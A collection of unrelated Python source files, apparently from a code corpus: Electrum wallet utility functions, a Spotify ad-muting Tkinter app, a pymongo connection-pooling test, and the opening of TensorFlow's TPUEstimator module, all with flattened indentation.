'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
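# Illustrative example (not from the original file): in a locale whose decimal point is '.',
# format_satoshis(1234500) returns "0.012345" -- the amount is divided by 10**decimal_point,
# rendered with 8 decimals, stripped of trailing zeros, and re-joined around the locale
# decimal point.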
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain/',
{'tx': 'transactions/', 'addr': 'addresses/'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp/',
{'tx': 'Transaction/', 'addr': 'Address/'}),
'Blockchain.info': ('https://blockchain.info/',
{'tx': 'tx/', 'addr': 'address/'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockr.io': ('https://btc.blockr.io/',
{'tx': 'tx/info/', 'addr': 'address/info/'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'BTC.com': ('https://chain.btc.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chain.so': ('https://www.chain.so/',
{'tx': 'tx/BTC/', 'addr': 'address/BTC/'}),
'Insight.is': ('https://insight.bitpay.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain/',
{'tx': 'tx/', 'addr': 'address/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockchair.com': ('https://blockchair.com/bitcoin/',
{'tx': 'transaction/', 'addr': 'address/'}),
'blockonomics.co': ('https://www.blockonomics.co/',
{'tx': 'api/tx?txid=', 'addr': '#/search?q='}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
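# Illustrative example (not from the original file): on mainnet with the default
# 'Blocktrail.com' explorer, block_explorer_URL(config, 'tx', txid) simply joins the tuple
# parts, producing 'https://www.blocktrail.com/BTC/tx/' followed by the txid.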
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise Exception("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
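# Illustrative example (not from the original file): for a valid address addr,
# create_URI(addr, 1000000, 'donation') builds 'bitcoin:<addr>?amount=0.01&message=donation',
# and parse_URI() on that string returns the address, the amount converted back to
# 1000000 satoshis, and the message/memo fields.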
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
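# Illustrative example (not from the original file): parse_json(b'{"id": 1}\n{"par')
# returns ({'id': 1}, b'{"par'), i.e. the first complete newline-terminated JSON object
# plus the unconsumed remainder, while a buffer containing no newline yields (None, buffer).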
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
mutefy.py
|
import os
import tkinter as tk
from tkinter import filedialog, messagebox  # messagebox is needed for the tk.messagebox call in openspotify()
import psutil
import pygetwindow as gw
import spotipy
import spotipy.util as util
import time
from pycaw.pycaw import AudioUtilities
from threading import Thread
import random
from pygame import mixer
username = 'Client Username Here'
cid = 'Client ID Here'
secret = 'Client Secret ID Here'
accessscope='user-read-currently-playing user-modify-playback-state'
redirectURI='Your redirectURI'
def setupobj(username,scope,clientid,clientsecret,redirect_uri):
token = util.prompt_for_user_token(username,scope,clientid,clientsecret,redirect_uri)
return spotipy.Spotify(auth=token)
def openspotify():
try:
if 'Spotify' in (p.name() for p in psutil.process_iter()):
s = gw.getWindowsWithTitle('Spotify')[0]
s.activate()
else:
os.system("Spotify")
except:
tk.messagebox.showinfo("Welcome to Mutefy", "Spotify is not installed! Please install Spotify!")
def checkads():
global sobj
sts.set("Running!")
txt.config(fg='green')
try:
trackInfo = sobj.current_user_playing_track()
except:
print('Token Expired!')
sobj = setupobj(username,accessscope,cid,secret,redirectURI)
trackInfo = sobj.current_user_playing_track()
try:
if trackInfo['currently_playing_type'] == 'ad':
mutefy(True)
global flag
if flag:
playmusic()
flag=False
else:
mixer.music.pause()
flag=True
mutefy(False)
except TypeError:
pass
mixer.init()
def playmusic():
try:
mixer.music.load(file)
mixer.music.set_volume(0.7)
mixer.music.play()
except:
pass
def mutefy(mute):
sessions = AudioUtilities.GetAllSessions()
for session in sessions:
vol = session.SimpleAudioVolume
if session.Process and session.Process.name() == 'Spotify.exe':
if mute:
vol.SetMute(1,None)
else:
vol.SetMute(0,None)
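# Illustrative note (not from the original file): mutefy(True) walks every active audio
# session reported by pycaw and calls SetMute(1, None) on the ones whose process is
# Spotify.exe, while mutefy(False) unmutes them again; audio from other applications
# is left untouched.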
def threading():
t1=Thread(target=work)
t1.start()
def supdate():
ct=gettrack()
ca=getartist()
calbum=getalbum()
tracks.set(ct)
artist.set(ca)
album.set(calbum)
win.update()
def work():
global flag
flag=True
while True:
checkads()
try:
supdate()
win.update()
except:
break
time.sleep(0.1)
def gettrack():
track = sobj.current_user_playing_track()
try:
trackn=track['item']['name']
except:
trackn="Ad or Stopped!"
name = "Now Playing: " + trackn
return name
def getartist():
gartist = sobj.current_user_playing_track()
artists=[]
try:
artistlen = len(gartist['item']['artists'])
for i in range(0,artistlen):
artists.append(gartist['item']['artists'][i]['name'])
artistn = ', '.join(artists)
except:
artistn="N/A"
aname = "Artist: " + artistn
return aname
def getalbum():
galbum = sobj.current_user_playing_track()
try:
albumn=galbum['item']['album']['name']
except:
albumn="N/A"
albumname = "Album: " + albumn
return albumname
def select():
global file
path = tk.filedialog.askdirectory()
fold = "Selected Folder: " + path
folder.set(fold)
file = os.path.join(path, random.choice(os.listdir(path)))
win=tk.Tk()
win.title('Mutefy')
win.geometry('360x280')
win.iconphoto(False,tk.PhotoImage(file='spotify.png'))
sobj = setupobj(username,accessscope,cid,secret,redirectURI)
tk.Label(win, text='Mutefy v1.0').pack()
tk.Button(win, text='Open Spotify', width=20, pady=5, command=openspotify).pack()
tk.Label(win, text='').pack()
tk.Label(win, text='Select the folder to play from when Spotify is muted').pack()
frame=tk.Frame()
frame.pack()
tk.Button(frame, text='Browse', width=8, pady=2, command=select).grid(row=0,column=0)
folder=tk.StringVar()
folder.set("Current Folder: None")
tk.Label(frame, textvariable=folder).grid(row=0,column=1)
tk.Label(win, text='').pack()
tk.Button(win, text='START' , bg='green', fg='white', width=10, pady=5, command=work).pack()
sts=tk.StringVar()
sts.set("Stopped...")
txt=tk.Label(win, textvariable=sts,fg='red',pady=5)
txt.pack()
tracks=tk.StringVar()
tracks.set(gettrack())
tk.Label(win, textvariable=tracks,pady=1).pack()
artist=tk.StringVar()
artist.set(getartist())
tk.Label(win, textvariable=artist,pady=1).pack()
album=tk.StringVar()
album.set(getalbum())
tk.Label(win, textvariable=album,pady=1).pack()
win.mainloop()
|
test_pooling.py
|
# Copyright 2009-2010 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test built in connection-pooling."""
import os
import random
import sys
import threading
import time
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from pymongo.connection import _Pool
from test_connection import get_connection
N = 50
DB = "pymongo-pooling-tests"
class MongoThread(threading.Thread):
def __init__(self, test_case):
threading.Thread.__init__(self)
self.connection = test_case.c
self.db = self.connection[DB]
self.ut = test_case
class SaveAndFind(MongoThread):
def run(self):
for _ in xrange(N):
rand = random.randint(0, N)
id = self.db.sf.save({"x": rand}, safe=True)
self.ut.assertEqual(rand, self.db.sf.find_one(id)["x"])
self.connection.end_request()
class Unique(MongoThread):
def run(self):
for _ in xrange(N):
self.db.unique.insert({})
self.ut.assertEqual(None, self.db.error())
self.connection.end_request()
class NonUnique(MongoThread):
def run(self):
for _ in xrange(N):
self.db.unique.insert({"_id": "mike"})
self.ut.assertNotEqual(None, self.db.error())
self.connection.end_request()
class Disconnect(MongoThread):
def run(self):
for _ in xrange(N):
self.connection.disconnect()
class NoRequest(MongoThread):
def run(self):
errors = 0
for _ in xrange(N):
self.db.unique.insert({"_id": "mike"})
if self.db.error() is None:
errors += 1
self.ut.assertEqual(0, errors)
def run_cases(ut, cases):
threads = []
for case in cases:
for i in range(10):
thread = case(ut)
thread.start()
threads.append(thread)
for t in threads:
t.join()
class OneOp(threading.Thread):
def __init__(self, connection):
threading.Thread.__init__(self)
self.c = connection
def run(self):
assert len(self.c._Connection__pool.sockets) == 1
self.c.test.test.find_one()
assert len(self.c._Connection__pool.sockets) == 0
self.c.end_request()
assert len(self.c._Connection__pool.sockets) == 1
class CreateAndReleaseSocket(threading.Thread):
def __init__(self, connection):
threading.Thread.__init__(self)
self.c = connection
def run(self):
self.c.test.test.find_one()
time.sleep(1)
self.c.end_request()
class TestPooling(unittest.TestCase):
def setUp(self):
self.c = get_connection()
# reset the db
self.c.drop_database(DB)
self.c[DB].unique.insert({"_id": "mike"})
self.c[DB].unique.find_one()
def test_no_disconnect(self):
run_cases(self, [NoRequest, NonUnique, Unique, SaveAndFind])
def test_disconnect(self):
run_cases(self, [SaveAndFind, Disconnect, Unique])
def test_independent_pools(self):
p = _Pool(None)
self.assertEqual([], p.sockets)
self.c.end_request()
self.assertEqual([], p.sockets)
# Sensical values aren't really important here
p1 = _Pool(5)
self.assertEqual(None, p.socket_factory)
self.assertEqual(5, p1.socket_factory)
def test_dependent_pools(self):
c = get_connection()
self.assertEqual(1, len(c._Connection__pool.sockets))
c.test.test.find_one()
self.assertEqual(0, len(c._Connection__pool.sockets))
c.end_request()
self.assertEqual(1, len(c._Connection__pool.sockets))
t = OneOp(c)
t.start()
t.join()
self.assertEqual(1, len(c._Connection__pool.sockets))
c.test.test.find_one()
self.assertEqual(0, len(c._Connection__pool.sockets))
def test_multiple_connections(self):
a = get_connection()
b = get_connection()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a.test.test.find_one()
a.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a_sock = a._Connection__pool.sockets[0]
b.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
b.test.test.find_one()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(0, len(b._Connection__pool.sockets))
b.end_request()
b_sock = b._Connection__pool.sockets[0]
b.test.test.find_one()
a.test.test.find_one()
self.assertEqual(b_sock, b._Connection__pool.socket())
self.assertEqual(a_sock, a._Connection__pool.socket())
def test_pool_with_fork(self):
if sys.platform == "win32":
raise SkipTest()
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest()
a = get_connection()
a.test.test.find_one()
a.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
a_sock = a._Connection__pool.sockets[0]
def loop(pipe):
c = get_connection()
self.assertEqual(1, len(c._Connection__pool.sockets))
c.test.test.find_one()
self.assertEqual(0, len(c._Connection__pool.sockets))
c.end_request()
self.assertEqual(1, len(c._Connection__pool.sockets))
pipe.send(c._Connection__pool.sockets[0].getsockname())
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
b_sock = cp1.recv()
c_sock = cp2.recv()
self.assert_(a_sock.getsockname() != b_sock)
self.assert_(a_sock.getsockname() != c_sock)
self.assert_(b_sock != c_sock)
self.assertEqual(a_sock, a._Connection__pool.socket())
def test_max_pool_size(self):
c = get_connection()
threads = []
for i in range(40):
t = CreateAndReleaseSocket(c)
t.start()
threads.append(t)
for t in threads:
t.join()
# There's a race condition, so be lenient
self.assert_(abs(10 - len(c._Connection__pool.sockets)) < 5)
if __name__ == "__main__":
unittest.main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
import collections
import copy
import os
import signal
import sys
import threading
import time
import math
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
try:
import google3
from google3.third_party.tensorflow.contrib.tpu.python.ops import tpu_ops
from google3.third_party.tensorflow.contrib.tpu.python.tpu import error_handling
from google3.third_party.tensorflow.contrib.tpu.python.tpu import session_support
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu_config
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu_context
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu_feed
from google3.third_party.tensorflow.contrib.tpu.python.tpu import training_loop
from google3.third_party.tensorflow.contrib.tpu.python.tpu import util as util_lib
from google3.third_party.tensorflow.contrib.training.python.training import hparam
from google3.third_party.tensorflow.core.framework import variable_pb2
from google3.third_party.tensorflow.core.framework.summary_pb2 import Summary
from google3.third_party.tensorflow.core.protobuf import config_pb2
from google3.third_party.tensorflow.python.data.ops import dataset_ops
from google3.third_party.tensorflow.python.data.util import nest as data_nest
from google3.third_party.tensorflow.python.estimator import (
estimator as estimator_lib,
)
from google3.third_party.tensorflow.python.estimator import model_fn as model_fn_lib
from google3.third_party.tensorflow.python.estimator.export import (
export_output as export_output_lib,
)
from google3.third_party.tensorflow.python.framework import constant_op
from google3.third_party.tensorflow.python.framework import dtypes
from google3.third_party.tensorflow.python.framework import errors
from google3.third_party.tensorflow.python.framework import ops
from google3.third_party.tensorflow.python.ops import array_ops
from google3.third_party.tensorflow.python.ops import check_ops
from google3.third_party.tensorflow.python.ops import control_flow_ops
from google3.third_party.tensorflow.python.ops import init_ops
from google3.third_party.tensorflow.python.ops import math_ops
from google3.third_party.tensorflow.python.ops import resource_variable_ops
from google3.third_party.tensorflow.python.ops import state_ops
from google3.third_party.tensorflow.python.ops import (
summary_ops_v2 as contrib_summary,
)
from google3.third_party.tensorflow.python.ops import variable_scope
from google3.third_party.tensorflow.python.ops import variables
from google3.third_party.tensorflow.python.platform import tf_logging as logging
from google3.third_party.tensorflow.python.saved_model import tag_constants
from google3.third_party.tensorflow.python.summary import summary
from google3.third_party.tensorflow.python.training import basic_session_run_hooks
from google3.third_party.tensorflow.python.training import evaluation
from google3.third_party.tensorflow.python.training import session_run_hook
from google3.third_party.tensorflow.python.training import training
from google3.third_party.tensorflow.python.training import training_util
from google3.third_party.tensorflow.python.util import function_utils
from google3.third_party.tensorflow.python.util import nest
from google3.third_party.tensorflow.python.util import tf_inspect
except ImportError:
import tensorflow
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import error_handling
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util as estimator_util
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.0
_TPU_ESTIMATOR = "custom_tpu_estimator" # CHANGE FOR RECURRENCY
_ITERATIONS_PER_LOOP_VAR = "iterations_per_loop"
_BATCH_SIZE_KEY = "batch_size"
_CTX_KEY = "context"
_USE_TPU_KEY = "use_tpu"
_CROSS_REPLICA_SUM_OP = "CrossReplicaSum"
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = "_tpu_enqueue_ops"
_TPU_TRAIN_OP = "_tpu_train_op"
_REWRITE_FOR_INFERENCE_MODE = "_rewrite_for_inference"
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
"{}_{}".format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn,
) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP],
)
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following values before each TPU training loop.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 input passed in by
the user.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
